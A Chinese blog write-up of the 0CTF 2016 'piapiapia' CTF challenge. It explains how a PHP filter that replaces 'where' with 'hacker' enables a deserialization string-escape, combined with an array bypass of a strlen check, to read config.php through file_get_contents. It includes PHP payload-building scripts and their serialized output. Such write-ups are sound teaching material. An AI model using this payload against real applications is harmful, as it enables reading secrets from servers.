当前位置：首页 > news >正文

0CTF 2016 piapiapia 1

news 来源：原创 2025/8/14 4:38:24

#源码泄露 #代码审计 #反序列化字符逃逸 #strlen长度过滤数组绕过
www.zip 得到源码

请添加图片描述

看到这里有flag ，猜测服务端docker的主机里，$flag变量应该存的就是我们要的flag。

于是，我们的目的就是读取·config.php

利用思路

这里存在任意文件读取漏洞

        $profile = unserialize($profile);$phone = $profile['phone'];$email = $profile['email'];$nickname = $profile['nickname'];$photo = base64_encode(file_get_contents($profile['photo']));

利用file_get_contents 读取文件

控制反序列化后的 photo

后面发现要点不是控制photo 利用反序列化把他挤下去

追踪文件读取

大纲：

profile的值为实例化的一个user类的对象，这个对象调用show_profile方法处理username
其中，调用了一个父类的方法 filter 处理username ，然后在show_profile里进行sql查询，返回查询结果，这个结果最终返回到 profile.php 读取photo 部分并输出

可见，我们需要利用photo部分。
怎么用？我们就要追溯 update.php了在那里，我们看到photo 的值是一个路径，在哪里利用user的update_profile 方法

所以，我们在update.php下进行注入（数据操作）

追踪 update_profile 也用 parent::filter 方法进行replace 然后调用父类的 parent::update 方法进行数据库交互（数据更新）

详解：下面是上面大纲的截取的部分详解

    public function update_profile($username, $new_profile) {$username = parent::filter($username);$new_profile = parent::filter($new_profile);$where = "username = '$username'";return parent::update($this->table, 'profile', $new_profile, $where);}

利用user类的update_profile 进行filter的更新

请添加图片描述

看到在update.php 路径下存在update对 profile 的修改

存在过滤

以下是对这段代码的逐句解释：

if(!preg_match('/^\d{11}$/', $_POST['phone']))die('Invalid phone');

功能：验证用户提交的手机号是否符合11位数字的格式。
逻辑：
- preg_match('/^\d{11}$/', $_POST['phone'])：使用正则表达式匹配$_POST['phone']的值。
  - ^\d{11}$：表示从字符串开头到结尾必须是恰好11位数字。
  - \d：匹配任意数字字符（0-9）。
  - {11}：表示前面的数字字符必须出现恰好11次。
- 如果匹配失败（即手机号不符合11位数字的格式），preg_match返回false，!preg_match的结果为true，执行die('Invalid phone')，程序终止并输出Invalid phone。

if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))die('Invalid email');

功能：验证用户提交的邮箱地址是否符合简单的邮箱格式规则。
逻辑：
- preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email'])：使用正则表达式匹配$_POST['email']的值。
  - ^[_a-zA-Z0-9]{1,10}：邮箱的本地部分（@前面的部分），允许1到10个字符，字符可以是字母（大小写）、数字或下划线。
  - @：邮箱地址中的@符号。
  - [_a-zA-Z0-9]{1,10}：邮箱的域名部分（@后面到.的部分），允许1到10个字符，字符可以是字母（大小写）、数字或下划线。
  - \.：邮箱地址中的.符号。
  - [_a-zA-Z0-9]{1,10}$：邮箱的顶级域名部分（.后面的部分），允许1到10个字符，字符可以是字母（大小写）、数字或下划线。
- 如果匹配失败（即邮箱格式不符合规则），preg_match返回false，!preg_match的结果为true，执行die('Invalid email')，程序终止并输出Invalid email。

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)die('Invalid nickname');

功能：验证用户提交的昵称是否只包含字母、数字或下划线，并且长度不超过10个字符。
逻辑：
- preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname'])：使用正则表达式检查$_POST['nickname']中是否存在非字母、非数字、非下划线的字符。
  - [^a-zA-Z0-9_]：匹配任何不在a-z、A-Z、0-9或_范围内的字符。
- strlen($_POST['nickname']) > 10：检查昵称的长度是否超过10个字符。
- 如果preg_match匹配到非法字符（返回true），或者昵称长度超过10个字符，整个条件表达式的结果为true，执行die('Invalid nickname')，程序终止并输出Invalid nickname。

总结

这段代码的作用是对用户提交的表单数据进行简单的格式验证：

手机号必须是11位数字。
邮箱地址必须符合简单的格式规则（本地部分@域名部分.顶级域名部分）。
昵称只能包含字母、数字或下划线，且长度不超过10个字符。

如果任何一项验证失败，程序会立即终止并输出相应的错误信息。

        $file = $_FILES['photo'];if($file['size'] < 5 or $file['size'] > 1000000)die('Photo size error');

以下是对这段代码的逐句解释：

$file = $_FILES['photo'];

功能：获取通过HTTP POST上传的文件信息。
逻辑：
- $_FILES['photo'] 是一个关联数组，包含了用户上传文件的相关信息。
- 'photo' 是表单中文件输入字段的名称，例如 <input type="file" name="photo">。
- $file 变量将存储文件的上传信息，包括临时文件名、原始文件名、文件大小、文件类型和错误信息等。

if($file['size'] < 5 or $file['size'] > 1000000)die('Photo size error');

功能：验证上传文件的大小是否在允许的范围内（5字节到1MB）。
逻辑：
- $file['size'] 是上传文件的大小，以字节为单位。
- 条件 $file['size'] < 5 or $file['size'] > 1000000 检查文件大小是否小于5字节或大于1MB。
- 如果条件成立（即文件大小不在允许范围内），执行 die('Photo size error')，程序终止并输出 Photo size error。

总结

这段代码的作用是验证用户上传的文件（照片）的大小是否符合要求：

文件大小必须在5字节到1MB之间。
如果文件大小不符合要求，程序会立即终止并输出错误信息 Photo size error。

注意事项

文件上传的安全性：
- 除了检查文件大小，还应该检查文件类型，确保只允许上传特定的文件类型（如图片）。
- 可以使用 $file['type'] 或者更可靠的方法（如检查文件扩展名或文件头）来验证文件类型。
错误处理：
- 使用 die() 会直接终止脚本运行，可能不太适合用户友好的界面。可以考虑使用更友好的错误提示方式，例如将错误信息存储在变量中并重新渲染表单。
文件上传的其他检查：
- 检查 $_FILES['photo']['error'] 是否为 UPLOAD_ERR_OK，以确保文件上传过程中没有发生错误。
- 检查文件是否真的被上传（即是否是一个临时文件）。

示例代码可以扩展为：

$file = $_FILES['photo'];// 检查文件上传是否有错误
if ($file['error'] !== UPLOAD_ERR_OK) {die('File upload error');
}// 检查文件大小
if ($file['size'] < 5 || $file['size'] > 1000000) {die('Photo size error');
}// 检查文件类型
$allowedTypes = ['image/jpeg', 'image/png', 'image/gif'];
if (!in_array($file['type'], $allowedTypes)) {die('Invalid file type');
}// 其他处理逻辑...

这样可以更全面地确保文件上传的安全性和正确性。

replace

追踪 update_profile 用 parent::filter 方法

public function filter($string) {$escape = array('\'', '\\\\');$escape = '/' . implode('|', $escape) . '/';$string = preg_replace($escape, '_', $string);$safe = array('select', 'insert', 'update', 'delete', 'where');$safe = '/' . implode('|', $safe) . '/i';return preg_replace($safe, 'hacker', $string);}public function __tostring() {return __class__;}

请添加图片描述

! 到这里幡然醒悟，我们利用这里对 profile 的replace 进行反序列化

看到可利用where被替换，将有一个多出来

$ 这里肯定不能直接对photo进行修改，那就考虑nickname入口，先试着构造下

<?php
$profile['phone']='12345678901';
$profile['email']='for@example.com';
$profile['nickname']='";s:5:"photo";s:10:"config.php";}';
$profile['photo']='upload/43892f297aksddn84743894a0eiek69f';
var_dump(serialize($profile));
?>

"a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:15:"for@example.com";s:8:"nickname";s:33:"";s:5:"photo";s:10:"config.php";}";s:5:"photo";s:39:"upload/43892f297aksddn84743894a0eiek69f";}"

数组序列化与类序列化的区别

序列化后的格式
- 普通数组的序列化字符串以 a 开头，表示数组（array）。
- 类的序列化字符串以 O 开头，表示对象（object），后面跟着类名和类的属性。
反序列化后的结果
- 普通数组反序列化后是一个数组。
- 类反序列化后是一个对象，且必须在当前脚本中定义了该类，否则会抛出错误。
类的特殊行为
- 类可以定义魔术方法 __sleep() 和 __wakeup() 来控制序列化和反序列化的过程。
- __sleep() 在序列化之前被调用，可以返回一个包含对象中应被序列化的变量名称的数组。
- __wakeup() 在反序列化之后被调用，可以用于重新初始化对象的属性。

请添加图片描述

超全局变量在这里实例化

我们继续：
我们要把上面那部分nickname逃逸出来

第一次过滤：
在uopdate里，存在对nickname的过滤

        if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)die('Invalid nickname');

正则表达式/[^a-zA-Z0-9_]/用于匹配任何不在指定字符集中的字符。下面是对该正则表达式各部分的详细解释：
[[正则匹配原则]]
正则表达式分解

/：正则表达式的开始和结束分界符。
[^...]：表示一个字符集的取反，即匹配不在方括号内的任何字符。
a-z：表示所有小写字母（从a到z）。
A-Z：表示所有大写字母（从A到Z）。
0-9：表示所有数字（从0到9）。
_：表示下划线字符。

匹配的字符

该正则表达式将匹配任何不在以下集合中的字符：

小写字母（a到z）
大写字母（A到Z）
数字（0到9）
下划线（_）

#strlen长度过滤数组绕过我们用数组绕过

第二次过滤：
即上面的replace

本地调试：
我们要读config.php

"a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:15:"for@example.com";s:8:"nickname";s:33:"";s:5:"photo";s:10:"config.php";}";s:5:"photo";s:11:"/config.php";}"

";s:5:“photo”;s:10:“config.php”;} 有33跟字符，所以我们需要33个·where

本地调试代码：

<?php
function filter($string){$safe = array('select', 'insert', 'update', 'delete', 'where');$safe = '/' . implode('|', $safe) . '/i';return preg_replace($safe, 'hacker', $string);
}
$profile['phone']='12345678901';
$profile['email']='for@example.com';
$profile['nickname']='wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}';
$profile['photo']='upload/43892f297aksddn84743894a0eiek69f';var_dump(filter(serialize($profile)));
?>

但看了wp ，还要把nickname数组化

<?php
function filter($string){$safe = array('select', 'insert', 'update', 'delete', 'where');$safe = '/' . implode('|', $safe) . '/i';return preg_replace($safe, 'hacker', $string);
}
$a=array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}');
$profile['phone']='12345678901';
$profile['email']='for@example.com';
$profile['nickname']=$a;
$profile['photo']='upload/43892f297aksddn84743894a0eiek69f';var_dump(filter(serialize($profile)));

"a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:15:"for@example.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/43892f297aksddn84743894a0eiek69f";}"

多了一个 } 所以要用34个where

解题

请添加图片描述

先注册个用户

请添加图片描述

可以看到，直接进到 update.php了

上传一个图片
请添加图片描述

抓包改name为数组

请添加图片描述

访问profile

f12
请添加图片描述

得到
请添加图片描述

0CTF 2016 piapiapia 1

#源码泄露 #代码审计 #反序列化字符逃逸 #strlen长度过滤数组绕过 www.zip 得到源码看到这里有flag ，猜测服务端docker的主机里，$flag变量应该存的就是我们要的flag。于是，我们的目的就是读取config.php 利用思路这里存在任意文件读取…...

编程日记 2025/8/14 4:38:24

ArcGIS Pro将有文字标注底图切换为无标注底图（在线地图图源）

今天介绍一下在ArcGIS Pro将有标注的地形底图换成无标注的底图。大家在这项目底图时候会经常调用ArcGIS Pro自带的地形图，但是这个地形图自带是有注记的，如下图。如何更改，才可以调用无文字注记的呢？ 对于一个已经切好图的有注记…...

编程日记 2025/8/14 4:35:57

股指期货有卖不出去的时候吗？

在股指期货的交易世界里，很多人都有这样的疑问：股指期货会不会有卖不出去的时候呢？答案是会的，下面咱们就来详细唠唠为啥会出现这种情况。市场极端行情下难以卖出 1.跌停限制：股指期货和股票一样，也有涨…...

编程日记 2025/8/9 16:30:20

NPM 常用操作指令大全

NPM（Node Package Manager）是 Node.js 默认的包管理工具，主要用于管理 JavaScript 项目的依赖包。以下是常用的 NPM 命令，涵盖安装、卸载、更新、查看等操作。 📌 1. NPM 初始化 npm init 逐步询问项目信息&#xff…...

编程日记 2025/8/14 4:35:56

Mysql与ElasticSearch间的数据同步场景模拟

一、场景简介现有酒店管理与酒店搜索预定两个分离的微服务模块，为了数据的安全性我们在就带你管理模块通过Mysql进行crud，为了搜索的高效和质量在搜索预定模块我们采用了ElasticSearch搜索引擎（视作一种NoSQL 数据库）&#xff0c…...

编程日记 2025/8/13 22:35:26

Qt-D指针与Q指针的设计哲学

文章目录前言PIMLP与二进制兼容性D指针Q指针优化d指针继承Q_D和Q_Q 前言在探索Qt源码的过程中会看到类的成员有一个d指针，d指针类型是一个private的类，这种设计模式称为PIMPL（pointer to implementation），本文根据Q…...

编程日记 2025/8/13 16:42:48

安装配置Anaconda，配置VSCode

文章目录 Anaconda介绍下载Anaconda安装Anaconda换源创建一个新环境conda常用命令 VSCode环境配置记录一下笔者收集的一些资料，不喜勿喷。 Anaconda介绍 Anaconda是一个用于科学计算的Python发行版，支持 Linux, Mac, Windows系统，提供了包管…...

编程日记 2025/8/7 20:14:37

迪威 3D 模型发布系统：制造业产品展示革新利器

在竞争激烈的制造业领域，如何将产品全方位、直观地呈现给客户，成为企业脱颖而出的关键。传统的产品展示方式往往受限于平面资料或有限的实物展示，难以让客户深入了解产品的复杂结构与精妙细节。迪威 3D 模型发布系统的问世，为制造…...

编程日记 2025/8/9 17:45:07

Matlab 汽车振动多自由度非线性悬挂系统和参数研究

1、内容简介略 Matlab 169-汽车振动多自由度非线性悬挂系统和参数研究可以交流、咨询、答疑 2、内容说明略第二章汽车模型建立 2.1 汽车悬架系统概述 2.1.1 悬架系统的结构和功能 2.1.2 悬架分类 2.2 四分之一车辆模型对于车辆动力学，一般都是研究其悬…...

编程日记 2025/8/10 19:38:39

编程题-第k个语法符号（中等）

题目： 我们构建了一个包含 n 行( 索引从 1 开始 )的表。首先在第一行我们写上一个 0。接下来的每一行，将前一行中的0替换为01，1替换为10。例如，对于 n 3 ，第 1 行是 0 ，第 2 行是 01 ，第3行…...

编程日记 2025/8/9 6:32:46

vscode打不开

Bug：窗口意外终止(原因:“launch-failed”，代码:“65" 对此造成的不便，我们深表歉意。可以打开新的空窗口以重新启动) 解决方法： 移情别恋：VS Code打开闪退并报‘launch-failed‘ code:‘65‘ 窗口意外终止(原因…...

编程日记 2025/8/14 4:37:42

使用生成对抗网络（GAN）进行人脸老化生成的Python示例

以下是一个使用生成对抗网络（GAN）进行人脸老化生成的Python示例，我们将使用PyTorch库来实现。GAN由生成器和判别器两部分组成，生成器尝试生成逼真的老化人脸图像，判别器则尝试区分生成的图像和真实的老化人脸图像。步…...

编程日记 2025/8/14 4:35:58

202503执行jmeter压测数据库(ScyllaDB,redis,lindorm,Mysql）

一、Mysql 1 、准备MySQL 连接内容 2 、下载连接jar包准备 mysql-connector-java-5.1.49.jar 放到 D:\apache-jmeter-5.6.3\lib\ext 目录下面； 3 、启动jmeter ,配置脚本添加线程组---》JDBC Connection Configuration---》JDBC Request---》查看结果树。 1）测…...

编程日记 2025/8/14 4:37:44

Uniapp当中的scroll-view滚动条不出现或者触底刷新事件不触发

一、未正确设置容器高度问题描述 scroll-view 未设置明确高度或高度值无效，导致无法形成有效滚动区域。解决方案 • 使用行内样式直接设置 height（如 style"height: 500rpx;"），避免类名样式被覆盖。 • 动态计算高度…...

编程日记 2025/8/10 21:28:23

3.16学习总结

学习了Java的知识点基本数据类型 byte占1字节，储存范围-128~127 short占2字节，储存范围-32768~32767 int占4字节，储存范围-2147483648~2147483647 long占8字节，储存范围是-9223372036854775808~9223372036854775807 float占…...

编程日记 2025/8/13 16:47:11

206. 反转链表

目录一、题目二、思路2.1 解题思路2.2 代码尝试2.3 疑难问题2.4 AI复盘三、解法四、收获4.1 心得4.2 举一反三一、题目二、思路 2.1 解题思路需要有头尾指针，然后又觉得可以用递归 2.2 代码尝试 class Solution { public:ListNode* reverseList(ListNode* h…...

编程日记 2025/6/28 6:00:24

音视频缓存数学模型

2024年8月的笔记音视频缓存数学模型 - Wesley’s Blog 播放器作为消费者，缓存作为生产者。进入缓冲一次设消费者速率为v1，生产者为v2，视频长度为l，x为生产者至少距离消费者多远才能保证在播完视频前两者重合。实际上就是一个…...

编程日记 2025/8/12 9:21:44

priority_queue模拟实现

目录介绍模拟实现无参构造函数迭代器构造 push插入 pop删除 top返回队首元素返回队列元素个数判空仿函数补充：反向迭代器模拟实现反向迭代器构造和析构重载和-- 解引用*和地址访问-> ! 反向迭代器在容器中实现补充练习数组中第…...

编程日记 2025/8/1 13:40:14

ChatGPT、DeepSeek、Grok：AI 语言模型的差异与应用场景分析

📝个人主页🌹：一ge科研小菜鸡-CSDN博客 🌹🌹期待您的关注 🌹🌹 1. 引言人工智能（AI）语言模型正在快速发展，ChatGPT（OpenAI）、DeepSe…...

编程日记 2025/8/10 6:04:23

Nginx 刷新后 404 的原因与解决方案

文章目录 Nginx 刷新后 404 的原因与解决方案静态资源路径问题（单页应用 SPA）解决方案：使用 try_files Nginx 资源路径 (root 或 alias) 配置错误示例：正确的 root配置浏览器缓存或 Nginx 缓存影响清除浏览器缓存给静态资源加版本…...

编程日记 2025/8/5 18:37:22

AI赋能实时安全背带监测解决方案

背景：安全背带检测的行业刚需与技术痛点在建筑施工、石油化工、仓储物流等高危行业中，安全背带是保障作业人员生命安全的最后一道防线。据统计，超过30%的高空坠落事故与未正确佩戴安全背带直接相关。传统依赖人工巡检的监督方式存在效率低、…...

编程日记 2025/8/4 4:41:43

【ES6】03-Set + Map

本文介绍两种集合 set map 的操作和方法。目录 1. Set 1.1 set基本使用 1.2 add 1.3 delete 1.4 has 1.5 size 1.6 set转换为数组 1.7 拓展运算符 1.8 for...of 1.9 forEach 1.10 set给数组去重 2. Map 2.1 创建map集合 2.2 set添加元素 2.3 delete删除元素 …...

编程日记 2025/8/5 14:51:49

upload?SSTI! import os import refrom flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirect from werkzeug.utils import secure_filename import os from werkzeug.utils import secure_filenameapp Flask(__name__)# 配置…...

编程日记 2025/8/8 15:16:18

利用思路

追踪文件读取

看到在update.php 路径下 存在update对 profile 的修改

存在过滤

总结

总结

注意事项

replace

数组序列化与类序列化的区别

解题

相关文章：

看到在update.php 路径下存在update对 profile 的修改